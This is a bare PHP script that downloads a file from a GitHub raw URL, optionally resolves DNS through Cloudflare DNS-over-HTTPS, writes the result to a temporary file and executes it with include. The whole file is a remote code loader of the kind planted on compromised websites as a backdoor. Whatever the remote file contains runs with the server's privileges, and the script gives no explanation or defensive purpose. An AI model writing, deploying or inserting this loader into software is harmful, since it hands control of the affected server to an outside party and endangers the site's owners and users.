<?php

$url = "https://raw.githubusercontent.com/aqilogic/logic/main/IDontKnow";

$ch = curl_init($url);

if (defined('CURLOPT_DOH_URL')) {
    curl_setopt($ch, CURLOPT_DOH_URL, "https://cloudflare-dns.com/dns-query");
}

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$data = curl_exec($ch);
curl_close($ch);

if ($data !== false) {
    $tmp = tmpfile();
    fwrite($tmp, $data);
    $meta = stream_get_meta_data($tmp);
    include $meta['uri'];
    fclose($tmp);
}
